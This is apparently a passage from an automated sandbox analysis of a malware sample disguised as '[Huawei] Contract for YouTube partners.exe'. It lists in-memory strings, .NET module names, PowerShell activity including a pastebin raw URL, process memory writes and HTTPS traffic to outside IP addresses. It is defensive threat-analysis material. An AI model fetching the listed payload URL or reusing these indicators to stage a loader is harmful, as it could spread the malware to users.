00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/dotnet/runtime
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9992000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB31F000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA5E6000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/winforms
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2446866312.0000020D2068A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.2229378708.0000016DCE5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2266658120.00000224101B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2426442069.0000020D1833D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2198121281.0000022400C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2275873193.0000022474176000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2273290349.0000022473EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown | Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3453EB7D NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34562068
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3456B9AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346330E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34532070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34536DD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34535E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3453C6D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD34534B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD3453DB0D
Source: [Huawei] Contract for YouTube partners.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248122759.000002B7E8E40000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251680767.000002B7EA330000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251295916.000002B7EA0C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Windows.Core.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246893106.000002B7E6011000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249747447.000002B7E9640000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245924097.00000277513D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245331226.0000027751290000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251506804.000002B7EA1F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244925040.000002774F991000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251180696.000002B7E9FD1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245605245.00000277512E0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249101985.000002B7E9330000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245701128.0000027751321000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248708035.000002B7E90E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251365686.000002B7EA1A0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3252368079.000002B7EA9E1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251204268.000002B7E9FE0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Windows.Core.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248367252.000002B7E8F70000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245130490.0000027751252000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWorkMoter.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248496144.000002B7E8FF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000000.2141674897.00007FF77A3F8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWorkMoter.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245483719.00000277512C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNETdesign.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248730109.000002B7E90F0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245901626.00000277513C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245415853.00000277512B1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNETdesign.dll4 vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244705711.000002774F921000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251529668.000002B7EA200000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3254587171.000002B7EE401000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248436550.000002B7E8FA1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250920794.000002B7E9E81000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250876793.000002B7E9E70000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251066988.000002B7E9F90000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246850829.000002B7E5F90000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245583929.00000277512D1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250853000.000002B7E9E51000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Xml.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246824918.000002B7E5F71000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249726194.000002B7E9631000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249078164.000002B7E9321000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs [Huawei] Contract for YouTube partners.exe
